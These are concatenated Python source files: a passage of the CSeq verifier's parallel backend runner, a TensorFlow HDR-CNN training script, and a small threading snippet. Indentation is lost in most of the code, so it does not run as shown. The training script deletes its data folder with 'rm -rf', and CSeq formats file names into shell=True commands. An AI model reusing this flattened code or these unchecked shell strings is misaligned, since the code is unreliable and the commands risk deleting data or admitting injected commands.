else: print("No parallel analysis")
depth = int(self.getInputParamValue('depth'))
timelimit = self.getInputParamValue('time')
backend = self.getInputParamValue('backend')
backendparams = self.getInputParamValue('backendparams')
witness = self.getInputParamValue('witness')
info = self.getInputParamValue('info')
''' Run the verification tool on the input file '''
seqfile = core.utils.rreplace(env.inputfile, '/', '/_cs_', 1) if '/' in env.inputfile else '_cs_' + env.inputfile
logfile = seqfile + '.' + backend + '.log' if witness is None else witness
core.utils.saveFile(seqfile, string)
if backend == 'esbmc':
cmd = backendFilename[backend] + cmdoptions[backend] + seqfile
if depth != 0:
cmd += ' --depth %s ' % str(depth)
elif backend == 'cbmc-assumptions':
cmd = backendFilename[backend] + cmdoptions[backend] + seqfile
if depth != 0:
cmd += ' --depth %s ' % str(depth)
elif backend == 'llbmc':
# llbmc and clang need to be matched
clangpath = '' if self.getInputParamValue('llvm') is None else self.getInputParamValue('llvm')
clangexe = clangpath +'clang'
cmd = "%s -c -g -I. -emit-llvm %s -o %s.bc 2> %s " % (clangexe, seqfile, seqfile[:-2], logfile)
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
core.utils.saveFile('clang_stdout.log', out)
core.utils.saveFile('clang_stderr.log', err)
cmd = backendFilename[backend] + ' ' + cmdoptions[backend] + ' ' + seqfile[:-2] + '.bc'
elif backend == 'blitz':
cmd = backendFilename[backend] + cmdoptions[backend] + seqfile
if depth != 0:
cmd += ' --depth %s ' % str(depth)
elif backend == 'satabs':
cmd = backendFilename[backend] + cmdoptions[backend] + seqfile
elif backend == '2ls':
cmd = backendFilename[backend] + cmdoptions[backend] + seqfile
elif backend == 'klee': # klee needs llvm-gcc version 2.9
clangpath = '' if self.getInputParamValue('llvm') is None else self.getInputParamValue('llvm')
clangexe = clangpath + 'llvm-gcc'
cmd = "%s -c -g -emit-llvm %s -o %s.bc " % (clangexe, seqfile, seqfile[:-2])
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
core.utils.saveFile('clang_stdout.log', out)
core.utils.saveFile('clang_stderr.log', err)
cmd = backendFilename[backend] + ' ' + cmdoptions[backend] + ' ' + seqfile[:-2] + '.bc'
elif backend == 'cpachecker':
cmd = backendFilename[backend] + cmdoptions[backend] + seqfile
elif backend == 'smack':
cmd = backendFilename[backend] + cmdoptions[backend] + seqfile
#try:
if simulate == 0:
processes = []
lock = multiprocessing.Lock()
#cores = 4 # multiprocessing.cpu_count()
# thread-safe shared vectors of
# process identifiers, process exit codes, and spawned processes' identifiers
# every process fills in its own entries
pool = multiprocessing.Array('i', [-1 for i in range(cores)]) # -1=not started, 0=terminated
code = multiprocessing.Array('i', [-1 for i in range(cores)]) # return codes
boh = multiprocessing.Array('i', [-1 for i in range(cores)]) # child processes PIDs
pipea,pipeb = multiprocessing.Pipe()
starttime = time.time()
if cores == 1:
args = "" if len(extrargs) == 0 else extrargs[0]
p = multiprocessing.Process(target=self.feed, args=(0,cores, cmd+' '+args,timelimit,backend,logfile, pool,code,boh, lock,pipeb, starttime))
processes.append(p)
p.start()
else:
for k in range(0,cores):
p = multiprocessing.Process(target=self.feed, args=(k,cores, cmd+' '+extrargs[k],timelimit,backend,logfile, pool,code,boh, lock,pipeb, starttime))
processes.append(p)
p.start()
# in any case,
# only one of the processes' output will make it to this point: either
# the first process that finds an error trace (or crashes), or
# the last one to terminate (or time out) without finding anything.
self.output = pipea.recv()
#print self.output
core.utils.saveFile(logfile,self.output)
# wait for all processes to terminate,
# if one of them finds the error will terminate all the others
for p in processes:
p.join()
else:
## Simulation mode ##
p = multiprocessing.Pool(cores)
with open(seqfile+".map") as f:
self.lines = f.readlines()
results = [p.apply_async(feed_sim, (self, cmd, info, timelimit, i, seqfile))
for i in range(simulate)]
done = [r.get() for r in results]
p.close()
pass_count, fail_count = Counter(), Counter()
for result in done:
for prop, success in result.items():
if success:
pass_count[prop] += 1
else:
fail_count[prop] += 1
self.output = "PASS: {}\nFAIL: {}".format(str(pass_count), str(fail_count))
''' Single-process Analysis.
- on finding a counterexample (at the moment detected by exitcode=10) terminates all other processes.
- on crashing (exitcode=6) terminates all other processes.
- on successfully terminating without crashing or counterexamples (exitcode=0) do nothing.
'''
def feed(self,id,cores, cmd,timeout,backend,logfile, pool,code,boh, l,pipe, starttime):
pool[id] = os.getpid() # store this process' pid into the shared array
tids = ','.join(str(x) for x in pool)
codes = ','.join(str(x) for x in code)
subs = ','.join(str(x) for x in boh)
#print("---> [%s] START +%0.2fs pid:[%s] cmd:[%s] pool:[%s] code:[%s] sub:[%s] <---" %(id,time.time()-starttime,os.getpid(),cmd,tids,codes,subs))
print("---> [%s] START +%0.2fs pid:[%s] cmd:[%s] <---" %(id,time.time()-starttime,os.getpid(),cmd))
p = core.utils.CommandPid(cmd)
newpid = p.spawn() # store stdout, stderr, process' return value
boh[id] = newpid # store the identifier for the spawned backend
###########print ("SPAWNED %s" % newpid)
out,err,cod = p.wait(int(timeout))
if cod is None: cod = -2
else: cod = int(cod)
code[id] = cod
####if 'warning' in err: self.warn('warnings on stderr from the backend')
# for CBMC, code=0 means SAFE, code=10 means UNSAFE, code=6 means error.
tids = ','.join(str(x) for x in pool)
codes = ','.join(str(x) for x in code)
subs = ','.join(str(x) for x in boh)
pool[id] = 0
# no error trace found or analysis timeout:
# if this is the last process to terminate,
# save the log;
# if there are still other processes running,
# no action taken.
if code[id] == 0 or code[id] == -9:
s = ''
if code[id] == 0: s = 'PASS'
if code[id] == -9: s = 'SKIP'
#print("---> [%s] %s +%0.2fs pid:[%s] cmd:[%s] pool:[%s] code:[%s] sub:[%s] <---" %(id,s,time.time()-starttime,os.getpid(),cmd,tids,codes,subs))
print("---> [%s] %s +%0.2fs pid:[%s] cmd:[%s] <---" %(id,s,time.time()-starttime,os.getpid(),cmd))
l.acquire()
# is this the only process still running?
lastone = not any(pool[k]!=0 and k!=id for k in range(cores))
# last process to terminate, and no error traces found
if lastone and code[id] == 0:
self.setOutputParam('exitcode', code[id])
# dump backend's output to file
######core.utils.saveFile(logfile,out)
pipe.send(out)
pipe.close()
l.release()
# error trace found or error from the backend
if not(code[id] == 0 or code[id] == -9):
print("---> [%s] FAIL +%0.2fs pid:[%s] cmd:[%s] <---" %(id,time.time()-starttime,os.getpid(),cmd))
# stop all other processes immediately
# But only if I am the first (boh[id] != 0)
if not(code[id] == 0 or code[id] == -9) and boh[id] != 0:
l.acquire()
for k in range(0,cores):
if boh[k] != 0:
try: # might have terminated meanwhile
os.kill(boh[k],signal.SIGTERM)
os.kill(boh[k],signal.SIGKILL)
boh[k] = 0
except:
pass
# dump error trace to file
######core.utils.saveFile(logfile,out)
pipe.send(out)
pipe.close()
self.setOutputParam('exitcode', code[id])
if code[id] not in (6,10): self.warn('unknown return value (%s) from the backend' %code[id])
l.release()
def feed_sim(mod, cmd, info, timeout, number, basename):
"""Single-process simulation
"""
place = {
"I": 'c init::1::_I!0@1#1 ',
"Lvalue": 'c init::1::_Lvalue!0@1#1 ',
"E": 'c init::1::_E!0@1#1 '
}
bitwidths = {
"char": 8,
"short": 16,
"int": 32
}
assumes = []
for (typ, pos, offset, value) in info.instrument():
bitw = bitwidths[typ]
startvar = findpropositionalvar(place[pos],mod.lines,offset*bitw).bind(mod)
assumes.extend(
"%i=%s" % x
for x in
zip(range(startvar,startvar+bitw), get_bin(int(value),bitw)[::-1])
)
cmd += " --assume " + ",".join(assumes)
p = core.utils.CommandPid(cmd)
newpid = p.spawn()
out,err,cod = p.wait(int(timeout))
if cod == 0:
# Something's wrong, simulations should always fail
raise "A simulation incorrectly ended without generating a trace"
properties_log = [l for l in out.splitlines() if l.startswith(">>>")]
properties_log = [l.split(" ") for l in properties_log]
properties = {}
for name, result in properties_log:
if name[3:] not in properties:
properties[name[3:]] = (True if "satisfied" in result else False)
else:
# Only update the dictionary if we have a violation
if "violated" in result:
properties[name[3:]] = False
logfile = "{}.{}.log".format(basename, number)
core.utils.saveFile(logfile, out)
return properties
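# --- Illustration only, not part of CSeq --------------------------------------
# Minimal sketch of the coordination pattern used by feed() above (it reuses the
# multiprocessing/time imports at the top of this module): every worker publishes
# its exit code in a shared Array; the first worker that "fails" reports through
# the Pipe immediately, while the last worker to finish cleanly reports "safe".
# Exit codes are hard-wired here: 10 plays the role of a counterexample, 0 of a
# safe result.
def _demo_worker(idx, mycode, codes, lock, pipe):
    time.sleep(0.1 * idx)                    # stagger termination
    codes[idx] = mycode
    lock.acquire()
    if mycode != 0:                          # counterexample: report immediately
        pipe.send("worker %d found a trace" % idx)
    elif all(c == 0 for c in codes):         # last clean worker: report "safe"
        pipe.send("all workers terminated safely")
    lock.release()

def _demo_first_result_wins(codes=(0, 0, 10, 0)):
    shared = multiprocessing.Array('i', [-1] * len(codes))
    lock = multiprocessing.Lock()
    recv_end, send_end = multiprocessing.Pipe()
    procs = [multiprocessing.Process(target=_demo_worker,
                                     args=(k, codes[k], shared, lock, send_end))
             for k in range(len(codes))]
    for p in procs:
        p.start()
    print(recv_end.recv())                   # e.g. "worker 2 found a trace"
    for p in procs:
        p.join()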
|
hdrcnn_train.py
|
"""
" License:
" -----------------------------------------------------------------------------
" Copyright (c) 2017, Gabriel Eilertsen.
" All rights reserved.
"
" Redistribution and use in source and binary forms, with or without
" modification, are permitted provided that the following conditions are met:
"
" 1. Redistributions of source code must retain the above copyright notice,
" this list of conditions and the following disclaimer.
"
" 2. Redistributions in binary form must reproduce the above copyright notice,
" this list of conditions and the following disclaimer in the documentation
" and/or other materials provided with the distribution.
"
" 3. Neither the name of the copyright holder nor the names of its contributors
" may be used to endorse or promote products derived from this software
" without specific prior written permission.
"
" THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
" IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
" ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
" LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
" CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
" SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
" INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
" CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
" ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
" POSSIBILITY OF SUCH DAMAGE.
" -----------------------------------------------------------------------------
"
" Description: Training script for the HDR-CNN
" Author: Gabriel Eilertsen, gabriel.eilertsen@liu.se
" Date: February 2018
"""
import time, math, os, sys, random
import tensorflow as tf
import tensorlayer as tl
import threading
import numpy as np
import scipy.stats as st
sys.path.insert(0, "../")
import network, img_io
eps = 1.0/255.0
#=== Settings =================================================================
FLAGS = tf.flags.FLAGS
tf.flags.DEFINE_integer("sx", "320", "Image width")
tf.flags.DEFINE_integer("sy", "320", "Image height")
tf.flags.DEFINE_integer("num_threads", "4", "Number of threads for multi-threaded loading of data")
tf.flags.DEFINE_integer("print_batch_freq", "5000", "Frequency for printing stats and saving images/parameters")
tf.flags.DEFINE_integer("print_batches", "5", "Number of batches to output images for at each [print_batch_freq] step")
tf.flags.DEFINE_bool("print_im", "true", "If LDR sample images should be printed at each [print_batch_freq] step")
tf.flags.DEFINE_bool("print_hdr", "false", "If HDR reconstructions should be printed at each [print_batch_freq] step")
# Paths
tf.flags.DEFINE_string("raw_dir", "input_data", "Path to unprocessed dataset")
tf.flags.DEFINE_string("data_dir", "training_data", "Path to processed dataset. This data will be created if the flag [preprocess] is set")
tf.flags.DEFINE_string("output_dir", "training_output", "Path to output directory, for weights and intermediate results")
tf.flags.DEFINE_string("vgg_path", "weights/vgg16_places365_weights.npy", "Path to VGG16 pre-trained weigths, for encoder convolution layers")
tf.flags.DEFINE_string("parameters", "weights/model_trained.npz", "Path to trained params for complete network")
tf.flags.DEFINE_bool("load_params", "false", "Load the parameters from the [parameters] path, otherwise the parameters from [vgg_path] will be used")
# Data augmentation parameters
tf.flags.DEFINE_bool("preprocess", "false", "Pre-process HDR input data, to create augmented dataset for training")
tf.flags.DEFINE_integer("sub_im", "10", "Number of subimages to pick in a 1 MP pixel image")
tf.flags.DEFINE_integer("sub_im_linearize", "0", "Linearize input images")
tf.flags.DEFINE_float("sub_im_sc1", "0.2", "Min size of crop, in fraction of input image")
tf.flags.DEFINE_float("sub_im_sc2", "0.6", "Max size of crop, in fraction of input image")
tf.flags.DEFINE_float("sub_im_clip1", "0.85", "Min saturation limit, i.e. min fraction of non-saturated pixels")
tf.flags.DEFINE_float("sub_im_clip2", "0.95", "Max saturation limit, i.e. max fraction of non-saturated pixels")
tf.flags.DEFINE_float("sub_im_noise1", "0.0", "Min noise std")
tf.flags.DEFINE_float("sub_im_noise2", "0.01", "Max noise std")
tf.flags.DEFINE_float("sub_im_hue_mean", "0.0", "Mean hue")
tf.flags.DEFINE_float("sub_im_hue_std", "7.0", "Std of hue")
tf.flags.DEFINE_float("sub_im_sat_mean", "0.0", "Mean saturation")
tf.flags.DEFINE_float("sub_im_sat_std", "0.1", "Std of saturation")
tf.flags.DEFINE_float("sub_im_sigmn_mean", "0.9", "Mean sigmoid exponent")
tf.flags.DEFINE_float("sub_im_sigmn_std", "0.1", "Std of sigmoid exponent")
tf.flags.DEFINE_float("sub_im_sigma_mean", "0.6", "Mean sigmoid offset")
tf.flags.DEFINE_float("sub_im_sigma_std", "0.1", "Std of sigmoid offset")
tf.flags.DEFINE_integer("sub_im_min_jpg", "30", "Minimum quality level of generated LDR images")
# Learning parameters
tf.flags.DEFINE_float("num_epochs", "100.0", "Number of training epochs")
tf.flags.DEFINE_float("start_step", "0.0", "Step to start from")
tf.flags.DEFINE_float("learning_rate", "0.00005", "Starting learning rate for Adam optimizer")
tf.flags.DEFINE_integer("batch_size", "4", "Batch size for training")
tf.flags.DEFINE_bool("sep_loss", "true", "Use illumination + reflectance loss")
tf.flags.DEFINE_float("lambda_ir", "0.5", "Reflectance weight for the ill+refl loss")
tf.flags.DEFINE_bool("rand_data", "true", "Random shuffling of training data")
tf.flags.DEFINE_float("train_size", "0.99", "Fraction of data to use for training, the rest is validation data")
tf.flags.DEFINE_integer("buffer_size", "256", "Size of load queue when reading training data")
#==============================================================================
sx = FLAGS.sx
sy = FLAGS.sy
data_dir_bin = os.path.join(FLAGS.data_dir, "bin")
data_dir_jpg = os.path.join(FLAGS.data_dir, "jpg")
log_dir = os.path.join(FLAGS.output_dir, "logs")
im_dir = os.path.join(FLAGS.output_dir, "im")
#=== Pre-processing/data augmentation =========================================
# Process training data
if (FLAGS.preprocess):
cmd = "./virtualcamera/virtualcamera -linearize %d -imsize %d %d 3 -input_path %s -output_path %s \
-subimages %d -cropscale %f %f -clip %f %f -noise %f %f \
-hue %f %f -sat %f %f -sigmoid_n %f %f -sigmoid_a %f %f \
-jpeg_quality %d" % \
(FLAGS.sub_im_linearize, sy, sx, FLAGS.raw_dir, FLAGS.data_dir, FLAGS.sub_im,
FLAGS.sub_im_sc1, FLAGS.sub_im_sc2,
FLAGS.sub_im_clip1, FLAGS.sub_im_clip2,
FLAGS.sub_im_noise1, FLAGS.sub_im_noise2,
FLAGS.sub_im_hue_mean, FLAGS.sub_im_hue_std,
FLAGS.sub_im_sat_mean, FLAGS.sub_im_sat_std,
FLAGS.sub_im_sigmn_mean, FLAGS.sub_im_sigmn_std,
FLAGS.sub_im_sigma_mean, FLAGS.sub_im_sigma_std,
FLAGS.sub_im_min_jpg);
print("\nRunning processing of training data")
print("cmd = '%s'\n\n"%cmd)
# Remove old data, and run new data generation
os.system("rm -rf %s"%FLAGS.data_dir)
os.makedirs(data_dir_bin)
os.makedirs(data_dir_jpg)
os.system(cmd)
print("\n")
# Create output directories
tl.files.exists_or_mkdir(log_dir)
tl.files.exists_or_mkdir(im_dir)
#=== Localize training data ===================================================
# Get names of all images in the training path
frames = [name for name in sorted(os.listdir(data_dir_bin)) if os.path.isfile(os.path.join(data_dir_bin, name))]
# Randomize the images
if FLAGS.rand_data:
random.shuffle(frames)
# Split data into training/validation sets
splitPos = len(frames) - math.floor(max(FLAGS.batch_size, min((1-FLAGS.train_size)*len(frames), 1000)))
frames_train, frames_valid = np.split(frames, [splitPos])
# Number of steps per epoch depends on the number of training images
training_samples = len(frames_train)
validation_samples = len(frames_valid)
steps_per_epoch = training_samples/FLAGS.batch_size
print("\n\nData to be used:")
print("\t%d training images" % training_samples)
print("\t%d validation images\n" % validation_samples)
#=== Load validation data =====================================================
# Load all validation images into memory
print("Loading validation data...")
x_valid, y_valid = [], []
for i in range(len(frames_valid)):
if i % 10 == 0:
print("\tframe %d of %d" % (i, len(frames_valid)))
succ, xv, yv = img_io.load_training_pair(os.path.join(data_dir_bin, frames_valid[i]), os.path.join(data_dir_jpg, frames_valid[i].replace(".bin", ".jpg")))
if not succ:
continue
xv = xv[np.newaxis,:,:,:]
yv = yv[np.newaxis,:,:,:]
if i == 0:
x_valid, y_valid = xv, yv
else:
x_valid = np.concatenate((x_valid, xv), axis=0)
y_valid = np.concatenate((y_valid, yv), axis=0)
print("...done!\n\n")
del frames
#=== Setup data queues ========================================================
# For single-threaded queueing of frame names
input_frame = tf.placeholder(tf.string)
q_frames = tf.FIFOQueue(FLAGS.buffer_size, [tf.string])
enqueue_op_frames = q_frames.enqueue([input_frame])
dequeue_op_frames = q_frames.dequeue()
# For multi-threaded queueing of training images
input_data = tf.placeholder(tf.float32, shape=[sy, sx, 3])
input_target = tf.placeholder(tf.float32, shape=[sy, sx, 3])
q_train = tf.FIFOQueue(FLAGS.buffer_size, [tf.float32, tf.float32], shapes=[[sy,sx,3], [sy,sx,3]])
enqueue_op_train = q_train.enqueue([input_target, input_data])
y_, x = q_train.dequeue_many(FLAGS.batch_size)
#=== Network ==================================================================
# Setup the network
print("Network setup:\n")
net, vgg16_conv_layers = network.model(x, FLAGS.batch_size, True)
y = net.outputs
train_params = net.all_params
# The TensorFlow session to be used
sess = tf.InteractiveSession()
#=== Loss function formulation ================================================
# For masked loss, only using information near saturated image regions
thr = 0.05 # Threshold for blending
msk = tf.reduce_max(y_, reduction_indices=[3])
msk = tf.minimum(1.0, tf.maximum(0.0, msk-1.0+thr)/thr)
msk = tf.reshape(msk, [-1, sy, sx, 1])
msk = tf.tile(msk, [1,1,1,3])
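# The mask ramps linearly from 0 to 1 as the per-pixel maximum of the target
# goes from (1-thr) to 1 (e.g. with thr=0.05, a maximum of 0.975 gives
# msk=0.5), so the losses below only act on and around saturated regions.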
# Loss separated into illumination and reflectance terms
if FLAGS.sep_loss:
y_log_ = tf.log(y_+eps)
x_log = tf.log(tf.pow(x, 2.0)+eps)
# Luminance
lum_kernel = np.zeros((1, 1, 3, 1))
lum_kernel[:, :, 0, 0] = 0.213
lum_kernel[:, :, 1, 0] = 0.715
lum_kernel[:, :, 2, 0] = 0.072
y_lum_lin_ = tf.nn.conv2d(y_, lum_kernel, [1, 1, 1, 1], padding='SAME')
y_lum_lin = tf.nn.conv2d(tf.exp(y)-eps, lum_kernel, [1, 1, 1, 1], padding='SAME')
x_lum_lin = tf.nn.conv2d(x, lum_kernel, [1, 1, 1, 1], padding='SAME')
# Log luminance
y_lum_ = tf.log(y_lum_lin_ + eps)
y_lum = tf.log(y_lum_lin + eps)
x_lum = tf.log(x_lum_lin + eps)
# Gaussian kernel
nsig = 2
filter_size = 13
interval = (2*nsig+1.)/(filter_size)
ll = np.linspace(-nsig-interval/2., nsig+interval/2., filter_size+1)
kern1d = np.diff(st.norm.cdf(ll))
kernel_raw = np.sqrt(np.outer(kern1d, kern1d))
kernel = kernel_raw/kernel_raw.sum()
# Illumination, approximated by means of Gaussian filtering
weights_g = np.zeros((filter_size, filter_size, 1, 1))
weights_g[:, :, 0, 0] = kernel
y_ill_ = tf.nn.conv2d(y_lum_, weights_g, [1, 1, 1, 1], padding='SAME')
y_ill = tf.nn.conv2d(y_lum, weights_g, [1, 1, 1, 1], padding='SAME')
x_ill = tf.nn.conv2d(x_lum, weights_g, [1, 1, 1, 1], padding='SAME')
# Reflectance
y_refl_ = y_log_ - tf.tile(y_ill_, [1,1,1,3])
y_refl = y - tf.tile(y_ill, [1,1,1,3])
x_refl = x - tf.tile(x_ill, [1,1,1,3])
cost = tf.reduce_mean( ( FLAGS.lambda_ir*tf.square( tf.subtract(y_ill, y_ill_) ) + (1.0-FLAGS.lambda_ir)*tf.square( tf.subtract(y_refl, y_refl_) ) )*msk )
cost_input_output = tf.reduce_mean( ( FLAGS.lambda_ir*tf.square( tf.subtract(x_ill, y_ill_) ) + (1.0-FLAGS.lambda_ir)*tf.square( tf.subtract(x_refl, y_refl_) ) )*msk )
else:
cost = tf.reduce_mean( tf.square( tf.subtract(y, tf.log(y_+eps) )*msk ) )
cost_input_output = tf.reduce_mean( tf.square( tf.subtract(tf.log(y_+eps), tf.log(tf.pow(x, 2.0)+eps) )*msk ) );
# Optimizer
global_step = tf.Variable(0, trainable=False)
starter_learning_rate = FLAGS.learning_rate
learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,
int(steps_per_epoch), 0.99, staircase=True)
train_op = tf.train.AdamOptimizer(learning_rate, beta1=0.9, beta2=0.999,
epsilon=1e-8, use_locking=False).minimize(cost, global_step=global_step, var_list = train_params)
#=== Data enqueueing functions ================================================
# For enqueueing of frame names
def enqueue_frames(enqueue_op, coord, frames):
num_frames = len(frames)
i, k = 0, 0
try:
while not coord.should_stop():
if k >= training_samples*FLAGS.num_epochs:
sess.run(q_frames.close())
break
if i == num_frames:
i = 0
if FLAGS.rand_data:
random.shuffle(frames)
fname = frames[i];
i += 1
k += 1
sess.run(enqueue_op, feed_dict={input_frame: fname})
except tf.errors.OutOfRangeError:
pass
except Exception as e:
coord.request_stop(e)
# For multi-threaded reading and enqueueing of frames
def load_and_enqueue(enqueue_op, coord):
try:
while not coord.should_stop():
fname = sess.run(dequeue_op_frames).decode("utf-8")
# Load pairs of HDR/LDR images
succ, input_data_r, input_target_r = img_io.load_training_pair(os.path.join(data_dir_bin, fname), os.path.join(data_dir_jpg, fname.replace(".bin", ".jpg")))
if not succ:
continue
sess.run(enqueue_op, feed_dict={input_data: input_data_r, input_target: input_target_r})
except Exception as e:
try:
sess.run(q_train.close())
except Exception as e:
pass
#=== Error and output function ================================================
# For calculation of loss and output of intermediate validation images to disk
def calc_loss_and_print(x_data, y_data, print_dir, step, N):
val_loss, orig_loss, n_batch = 0, 0, 0
for b in range(int(x_data.shape[0]/FLAGS.batch_size)):
x_batch = x_data[b*FLAGS.batch_size:(b+1)*FLAGS.batch_size,:,:,:]
y_batch = y_data[b*FLAGS.batch_size:(b+1)*FLAGS.batch_size,:,:,:]
feed_dict = {x: x_batch, y_: y_batch}
err1, err2, y_predict, y_gt, M = sess.run([cost, cost_input_output, y, y_, msk], feed_dict=feed_dict)
val_loss += err1; orig_loss += err2; n_batch += 1
batch_dir = print_dir
if x_data.shape[0] > x_batch.shape[0]:
batch_dir = '%s/batch_%03d' % (print_dir, n_batch)
if n_batch <= N or N < 0:
if not os.path.exists(batch_dir):
os.makedirs(batch_dir)
for i in range(0, x_batch.shape[0]):
yy_p = np.squeeze(y_predict[i])
xx = np.squeeze(x_batch[i])
yy = np.squeeze(y_gt[i])
mm = np.squeeze(M[i])
# Apply inverse camera curve
x_lin = np.power(np.divide(0.6*xx, np.maximum(1.6-xx, 1e-10) ), 1.0/0.9)
# Transform log predictions to linear domain
yy_p = np.exp(yy_p)-eps
# Masking
y_final = (1-mm)*x_lin + mm*yy_p
# Gamma correction
yy_p = np.power(np.maximum(yy_p, 0.0), 0.5)
y_final = np.power(np.maximum(y_final, 0.0), 0.5)
yy = np.power(np.maximum(yy, 0.0), 0.5)
xx = np.power(np.maximum(x_lin, 0.0), 0.5)
# Print LDR samples
if FLAGS.print_im:
img_io.writeLDR(xx, "%s/%06d_%03d_in.png" % (batch_dir, step, i+1), -3)
img_io.writeLDR(yy, "%s/%06d_%03d_gt.png" % (batch_dir, step, i+1), -3)
img_io.writeLDR(y_final, "%s/%06d_%03d_out.png" % (batch_dir, step, i+1), -3)
# Print HDR samples
if FLAGS.print_hdr:
img_io.writeEXR(xx, "%s/%06d_%03d_in.exr" % (batch_dir, step, i+1))
img_io.writeEXR(yy, "%s/%06d_%03d_gt.exr" % (batch_dir, step, i+1))
img_io.writeEXR(y_final, "%s/%06d_%03d_out.exr" % (batch_dir, step, i+1))
return (val_loss/n_batch, orig_loss/n_batch)
#=== Setup threads and load parameters ========================================
# Summary for Tensorboard
tf.summary.scalar("learning_rate", learning_rate)
summaries = tf.summary.merge_all()
file_writer = tf.summary.FileWriter(log_dir, sess.graph)
sess.run(tf.global_variables_initializer())
# Threads and thread coordinator
coord = tf.train.Coordinator()
thread1 = threading.Thread(target=enqueue_frames, args=[enqueue_op_frames, coord, frames_train])
thread2 = [threading.Thread(target=load_and_enqueue, args=[enqueue_op_train, coord]) for i in range(FLAGS.num_threads)]
thread1.start()
for t in thread2:
t.start()
threads = tf.train.start_queue_runners(coord=coord, sess=sess)
# Loading model weights
if(FLAGS.load_params):
# Load model weights
print("\n\nLoading trained parameters from '%s'..." % FLAGS.parameters)
load_params = tl.files.load_npz(name=FLAGS.parameters)
tl.files.assign_params(sess, load_params, net)
print("...done!\n")
else:
# Load pretrained VGG16 weights for encoder
print("\n\nLoading parameters for VGG16 convolutional layers, from '%s'..." % FLAGS.vgg_path)
network.load_vgg_weights(vgg16_conv_layers, FLAGS.vgg_path, sess)
print("...done!\n")
#=== Run training loop ========================================================
print("\nStarting training...\n")
step = FLAGS.start_step
train_loss = 0.0
start_time = time.time()
start_time_tot = time.time()
# The training loop
try:
while not coord.should_stop():
step += 1
_, err_t = sess.run([train_op,cost])
train_loss += err_t
# Statistics on intermediate progress
v = int(max(1.0,FLAGS.print_batch_freq/5.0))
if (int(step) % v) == 0:
val_loss, n_batch = 0, 0
# Validation loss
for b in range(int(x_valid.shape[0]/FLAGS.batch_size)):
x_batch = x_valid[b*FLAGS.batch_size:(b+1)*FLAGS.batch_size,:,:,:]
y_batch = y_valid[b*FLAGS.batch_size:(b+1)*FLAGS.batch_size,:,:,:]
feed_dict = {x: x_batch, y_: y_batch}
err = sess.run(cost, feed_dict=feed_dict)
val_loss += err; n_batch += 1
# Training and validation loss for Tensorboard
train_summary = tf.Summary()
valid_summary = tf.Summary()
valid_summary.value.add(tag='validation_loss',simple_value=val_loss/n_batch)
file_writer.add_summary(valid_summary, step)
train_summary.value.add(tag='training_loss',simple_value=train_loss/v)
file_writer.add_summary(train_summary, step)
# Other statistics for Tensorboard
summary = sess.run(summaries)
file_writer.add_summary(summary, step)
file_writer.flush()
# Intermediate training statistics
print(' [Step %06d of %06d. Processed %06d of %06d samples. Train loss = %0.6f, valid loss = %0.6f]' % (step, steps_per_epoch*FLAGS.num_epochs, (step % steps_per_epoch)*FLAGS.batch_size, training_samples, train_loss/v, val_loss/n_batch))
train_loss = 0.0
# Print statistics, and save weights and some validation images
if step % FLAGS.print_batch_freq == 0:
duration = time.time() - start_time
duration_tot = time.time() - start_time_tot
print_dir = '%s/step_%06d' % (im_dir, step)
val_loss, orig_loss = calc_loss_and_print(x_valid, y_valid, print_dir, step, FLAGS.print_batches)
# Training statistics
print('\n')
print('-------------------------------------------')
print('Currently at epoch %0.2f of %d.' % (step/steps_per_epoch, FLAGS.num_epochs))
print('Valid loss input = %.5f' % (orig_loss))
print('Valid loss trained = %.5f' % (val_loss))
print('Timings:')
print(' Since last: %.3f sec' % (duration))
print(' Per step: %.3f sec' % (duration/FLAGS.print_batch_freq))
print(' Per epoch: %.3f sec' % (duration*steps_per_epoch/FLAGS.print_batch_freq))
print('')
print(' Per step (avg): %.3f sec' % (duration_tot/step))
print(' Per epoch (avg): %.3f sec' % (duration_tot*steps_per_epoch/step))
print('')
print(' Total time: %.3f sec' % (duration_tot))
print(' Exp. time left: %.3f sec' % (duration_tot*steps_per_epoch*FLAGS.num_epochs/step - duration_tot))
print('-------------------------------------------')
# Save current weights
tl.files.save_npz(net.all_params , name=("%s/model_step_%06d.npz"%(log_dir,step)))
print('\n')
start_time = time.time()
except tf.errors.OutOfRangeError:
print('Done!')
except Exception as e:
print("ERROR: ", e)
#=== Final stats and weights ==================================================
duration = time.time() - start_time
duration_tot = time.time() - start_time_tot
print_dir = '%s/step_%06d' % (im_dir, step)
val_loss, orig_loss = calc_loss_and_print(x_valid, y_valid, print_dir, step, FLAGS.print_batches)
# Final statistics
print('\n')
print('-------------------------------------------')
print('Finished at epoch %0.2f of %d.' % (step/steps_per_epoch, FLAGS.num_epochs))
print('Valid loss input = %.5f' % (orig_loss))
print('Valid loss trained = %.5f' % (val_loss))
print('Timings:')
print(' Per step (avg): %.3f sec' % (duration_tot/step))
print(' Per epoch (avg): %.3f sec' % (duration_tot*steps_per_epoch/step))
print('')
print(' Total time: %.3f sec' % (duration_tot))
print('-------------------------------------------')
# Save final weights
tl.files.save_npz(net.all_params , name=("%s/model_step_%06d.npz"%(log_dir,step)))
print('\n')
#=== Shut down ================================================================
# Stop threads
print("Shutting down threads...")
try:
coord.request_stop()
except Exception as e:
print("ERROR: ", e)
# Wait for threads to finish
print("Waiting for threads...")
coord.join(threads)
file_writer.close()
sess.close()
|
threading1.py
|
import threading
import time
def func():
print("ran\n")
time.sleep(1)
print('done')
